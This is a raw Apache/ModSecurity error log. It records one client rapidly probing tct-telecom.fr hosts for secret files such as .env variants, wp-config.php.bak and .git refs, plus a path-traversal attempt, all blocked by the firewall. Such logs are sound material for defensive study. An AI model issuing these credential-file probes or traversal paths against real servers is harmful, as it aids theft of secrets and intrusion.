[Mon May 11 15:23:23.691585 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVXgAAAIQ"]
[Mon May 11 15:23:23.691713 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVXgAAAIQ"]
[Mon May 11 15:23:23.691910 2026] [security2:error] [pid 1319998:tid 1320004] [client 195.178.110.133:47172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS6t2WtvoFr7xvGzVXgAAAIQ"]
[Mon May 11 15:23:23.692037 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.897133 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNbwAAAFM"]
[Mon May 11 15:23:23.897335 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNbwAAAFM"]
[Mon May 11 15:23:23.897539 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNbwAAAFM"]
[Mon May 11 15:23:23.898837 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.955437 2026] [proxy_fcgi:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:23.956015 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNcAAAAFM"]
[Mon May 11 15:23:23.956178 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNcAAAAFM"]
[Mon May 11 15:23:23.956378 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYS-JEyNRN152ArOSNcAAAAFM"]
[Mon May 11 15:23:23.956533 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:47232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYS6O9RdIr1DwxYR2TTQAAANU"]
[Mon May 11 15:23:23.956681 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:47232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYS6O9RdIr1DwxYR2TTQAAANU"]
[Mon May 11 15:23:23.956927 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:47232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYS6O9RdIr1DwxYR2TTQAAANU"]
[Mon May 11 15:23:23.957606 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.975478 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS-JEyNRN152ArOSNcQAAAFM"]
[Mon May 11 15:23:23.975613 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS-JEyNRN152ArOSNcQAAAFM"]
[Mon May 11 15:23:23.975818 2026] [security2:error] [pid 1320398:tid 1320419] [client 195.178.110.133:47164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS-JEyNRN152ArOSNcQAAAFM"]
[Mon May 11 15:23:23.978803 2026] [proxy_fcgi:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:23.985844 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:23.993011 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:47430] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYS6y-5-wpj6Sx56aZXgAAAAk"]
[Mon May 11 15:23:23.993226 2026] [security2:error] [pid 1319886:tid 1319913] [client 195.178.110.133:47430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYS6y-5-wpj6Sx56aZXgAAAAk"]
[Mon May 11 15:23:23.996254 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:47232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TTwAAANU"]
[Mon May 11 15:23:23.996401 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:47232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TTwAAANU"]
[Mon May 11 15:23:23.996608 2026] [security2:error] [pid 1320674:tid 1320710] [client 195.178.110.133:47232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agHYS6O9RdIr1DwxYR2TTwAAANU"]
[Mon May 11 15:23:23.999645 2026] [security2:error] [pid 1320398:tid 1320402] [client 195.178.110.133:47360] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYS-JEyNRN152ArOSNcgAAAEI"]
[Mon May 11 15:23:23.999794 2026] [security2:error] [pid 1320398:tid 1320402] [client 195.178.110.133:47360] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYS-JEyNRN152ArOSNcgAAAEI"]
[Mon May 11 15:23:24.002138 2026] [proxy_fcgi:error] [pid 1319953:tid 1319962] [client 195.178.110.133:47136] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.002297 2026] [security2:error] [pid 1320674:tid 1320704] [client 195.178.110.133:47332] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYTKO9RdIr1DwxYR2TUAAAAM8"]
[Mon May 11 15:23:24.002442 2026] [security2:error] [pid 1320674:tid 1320704] [client 195.178.110.133:47332] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYTKO9RdIr1DwxYR2TUAAAAM8"]
[Mon May 11 15:23:24.004970 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:47352] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYTOJEyNRN152ArOSNcwAAAEg"]
[Mon May 11 15:23:24.005107 2026] [security2:error] [pid 1320398:tid 1320408] [client 195.178.110.133:47352] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agHYTOJEyNRN152ArOSNcwAAAEg"]
[Mon May 11 15:23:24.007766 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.133:47448] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYTKy-5-wpj6Sx56aZXwAAAAI"]
[Mon May 11 15:23:24.007929 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.133:47448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYTKy-5-wpj6Sx56aZXwAAAAI"]
[Mon May 11 15:23:24.007999 2026] [security2:error] [pid 1319998:tid 1320008] [client 195.178.110.133:47510] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYTKt2WtvoFr7xvGzVYgAAAIg"]
[Mon May 11 15:23:24.008126 2026] [security2:error] [pid 1319998:tid 1320008] [client 195.178.110.133:47510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYTKt2WtvoFr7xvGzVYgAAAIg"]
[Mon May 11 15:23:24.009130 2026] [security2:error] [pid 1319953:tid 1319961] [client 195.178.110.133:47388] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYS-SQ-m-m0ukSShuCegAAAUY"]
[Mon May 11 15:23:24.009283 2026] [security2:error] [pid 1319953:tid 1319961] [client 195.178.110.133:47388] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.production"] [unique_id "agHYS-SQ-m-m0ukSShuCegAAAUY"]
[Mon May 11 15:23:24.010408 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.010927 2026] [core:error] [pid 1319998:tid 1320006] [client 195.178.110.133:47336] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:24.010986 2026] [security2:error] [pid 1320674:tid 1320697] [client 195.178.110.133:47416] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYTKO9RdIr1DwxYR2TUQAAAMc"]
[Mon May 11 15:23:24.011124 2026] [security2:error] [pid 1320674:tid 1320697] [client 195.178.110.133:47416] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYTKO9RdIr1DwxYR2TUQAAAMc"]
[Mon May 11 15:23:24.012186 2026] [security2:error] [pid 1319885:tid 1319890] [client 195.178.110.133:47446] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYTFchVQ3tCn0m9OpZqQAAAQI"]
[Mon May 11 15:23:24.012325 2026] [security2:error] [pid 1319885:tid 1319890] [client 195.178.110.133:47446] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agHYTFchVQ3tCn0m9OpZqQAAAQI"]
